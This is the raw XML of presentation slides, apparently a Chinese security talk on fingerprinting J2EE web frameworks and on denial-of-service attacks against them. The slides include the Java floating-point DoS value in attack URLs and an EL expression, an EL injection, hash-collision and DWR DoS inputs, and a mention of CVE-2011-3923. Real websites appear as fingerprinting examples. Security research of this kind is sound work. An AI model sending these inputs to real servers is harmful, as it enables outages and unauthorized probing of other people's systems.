            <a:ext cx="900430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4583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默认</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>处理逻辑</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0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url mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2762771" y="2084388"/>
            <a:ext cx="6192838" cy="266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3600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>处理用户请求的框架</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="98946" y="2084388"/>
            <a:ext cx="1223963" cy="429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USER</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2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1394346" y="2660651"/>
            <a:ext cx="1223963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0109" y="3416301"/>
            <a:ext cx="1657350" cy="1044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action1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31309" y="3416301"/>
            <a:ext cx="1655762" cy="1044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action2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83946" y="3416301"/>
            <a:ext cx="1655763" cy="1044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action3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62771" y="5395913"/>
            <a:ext cx="6192838" cy="792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07234" y="5524501"/>
            <a:ext cx="2609850" cy="615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template1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44096" y="5529263"/>
            <a:ext cx="2563813" cy="6175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template2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5715521" y="4857751"/>
            <a:ext cx="360363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15" name="左箭头 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1394346" y="5562601"/>
            <a:ext cx="1223963" cy="447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056290" y="6473825"/>
            <a:ext cx="503238" cy="35877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3261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turbine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>框架的逗号们</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean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templates/pubinfo/infopub/businpub.html</a:t>
            </a:r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135188"/>
            <a:ext cx="8291512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492500" y="2276475"/>
            <a:ext cx="4679950" cy="5762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03230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turbine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>框架的逗号们</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean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turbine/template/pubinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>infopub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>businpub.html</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Turbine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Template</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>逗号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turbine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>框架，分值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>90%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14526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的叹号们</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean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395288" y="1773238"/>
          <a:ext cx="7921625" cy="426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21625"/>
              </a:tblGrid>
              <a:tr h="309634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4000" b="0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public class </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="4000" b="0" u="sng" kern="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TestAction</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="4000" b="0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extends </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="4000" b="0" kern="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ActionSupport</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="4000" b="0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{</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="40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4000" b="0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40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4000" b="0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	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="4000" b="1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public</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="4000" b="0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String </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="4000" b="1" kern="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adduser</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="4000" b="0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(){</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="40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4000" b="0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		return SUCCESS;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="40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4000" b="0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	}</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="40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000" b="0" u="sng" kern="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}</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" sz="40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6" marR="68586" marT="0" marB="0"/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9878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的叹号们</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/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http://www.inbreak.net/test.action</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>http://xxx/test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6000" b="1" smtClean="0"/>
              <a:t>!adduser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>.action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>分值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>95%</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/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98532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默认开发命名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0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/xxxController</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>/xxxController.do</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>/controller/xxx.htm</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Spring mvc 50%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>分值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64720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适合听众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dirty="0" smtClean="0"/>
              <a:t>实战派攻击技术爱好者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WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻城狮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JAVA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>开发</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>安全扫描工具开发人员</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>理论派研究人员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默认大家已经掌握一些相关基础技术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3383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所有框架</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>指纹</a:t>
            </a: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让它出错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500</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>错误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404</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>错误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100%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>的确认框架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96189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参数类型错误</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/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数字</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>日期</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>变为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" smtClean="0"/>
              <a:t>http://www.polyplastics.com/v/n?i=933&amp;l=03&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6600" b="1" u="sng" smtClean="0"/>
              <a:t>s=1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1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130425"/>
            <a:ext cx="7620000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74629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参数类型错误</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/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u="sng" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.polyplastics.com/v/n?i=933&amp;l=03&amp;s=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6000" b="1" u="sng" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6000" b="1" u="sng" smtClean="0"/>
              <a:t>kxlzx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="6000" b="1" smtClean="0"/>
          </a:p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7847012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0" y="4581525"/>
            <a:ext cx="2520950" cy="5762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3350" y="5373688"/>
            <a:ext cx="4824413" cy="12239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60484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业务逻辑错误</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/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841374" y="1497013"/>
            <a:ext cx="7691065" cy="4525962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https://www.cibil.com/online/manageCustomerDetails.do?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>action=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>showAddPaymentPage</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="4800" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0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76" y="921420"/>
            <a:ext cx="8166100" cy="573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83349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业务逻辑错误</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/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841375" y="1052513"/>
            <a:ext cx="7545388" cy="4525962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0" smtClean="0"/>
              <a:t>action=showAddPyy7aymentPage</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3686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20938"/>
            <a:ext cx="7777163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284663" y="3141663"/>
            <a:ext cx="2519362" cy="5746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288" y="4043363"/>
            <a:ext cx="6121400" cy="5762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" y="2492375"/>
            <a:ext cx="7704138" cy="2952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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:t>Action[/XXXXX] does not contain method named YYYYY</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="44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9588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文件名错误</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/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http://eoweb.dlr.de:8080/servlets/template/welcome/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1" smtClean="0"/>
              <a:t>entryPage.vm</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" smtClean="0"/>
          </a:p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775"/>
            <a:ext cx="7705725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775"/>
            <a:ext cx="7705725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63350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万能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>google</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean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命名空间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google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>搜索“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>com.netease</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>”</a:t>
            </a:r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96975"/>
            <a:ext cx="6985000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E:\doc\my\myresearch\x\163\google搜索com.netease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17613"/>
            <a:ext cx="6985000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E:\doc\my\myresearch\x\163\google搜索com.netease2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17613"/>
            <a:ext cx="6985000" cy="56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19800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万能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>google</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39939" name="内容占位符 3" descr="E:\doc\my\myresearch\x\163\tomcat错误.bm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000" y="1052513"/>
            <a:ext cx="7366000" cy="5272087"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1835150" y="4889500"/>
            <a:ext cx="2498725" cy="61118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16833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环境的影响</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0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不断的招聘开发者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推荐框架、主要框架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离职可以立刻接手</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>加分项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671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可能的位置</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/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</a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>静态资源映射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Directory traversal vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>《</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Struts2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>框架安全缺陷》</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>struts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>”、或“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>”开头</a:t>
            </a:r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84313"/>
            <a:ext cx="7561263" cy="496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36476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WEB</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean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JSP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Servlet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50651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其他地方</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/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开发人员的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>blog</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>内部论坛对外</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/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06642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框架指纹章节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Q&amp;A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>？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5533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有多少拒绝服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>目录</a:t>
            </a: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>浮点漏洞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Tomcat    transfer-encoding: buffered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>碰撞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/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4100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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>浮点漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/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网上交易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2591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 DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean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http://www.inbreak.net/app/secTest.action?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5400" b="1" smtClean="0"/>
              <a:t>new java.lang.Double(2.2250738585072012e-308)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="5400" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/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0856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 DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/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>
          <a:xfrm>
            <a:off x="-108520" y="854857"/>
            <a:ext cx="9252520" cy="4525962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>java.lang.Double</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0.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22250738585072012</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct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2018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 DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/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仅仅是技术讨论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不适合实战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直接拿</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CVE-2011-3923</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>杀过去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3401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spring mvc dos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altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Message=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>applicationScope</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>EL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err="1"/>
              <a:t>index.htm?message</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=${0.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22250738585072012}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4145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邪恶的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>JAVA HASH DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/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JSON OBJECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>拒绝服务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url?var={“aaaaa”:”bbbbb”,”ccccc”:”ddddd”}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="http://paper.wooyun.org/upload/201205/19212915ea2fe59e8f845764b763934d68e3dd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098800"/>
            <a:ext cx="8208963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43710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DWR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>框架</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/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C0-pram0=Object_Object:{id:reference:c0-e2, address:reference:c0-e3,………..etc..}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp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255838"/>
            <a:ext cx="87630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1352550"/>
            <a:ext cx="881697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079625"/>
            <a:ext cx="813435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45449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WEB</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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J2EE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t> 处理用户请求框架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J2EE ORM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>框架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J2EE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>展示层框架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AJAX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>框架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10427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有多少拒绝服务章节</a:t>
            </a:r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Q &amp; A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02633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鸡肋变绝杀</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/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提高漏洞的发现率</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>本地变远程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3556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xfrm>
            <a:off x="251520" y="0"/>
            <a:ext cx="8568952" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>提高</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>struts2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>自定的页面漏洞的发现率</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0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《</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>struts2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>框架安全缺陷》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的那些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" smtClean="0"/>
              <a:t>类型缺陷（自定的页面）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US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637751"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="611188" y="3068638"/>
          <a:ext cx="7993062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93062"/>
              </a:tblGrid>
              <a:tr h="292576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8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</a:t>
                      </a:r>
                      <a:r>
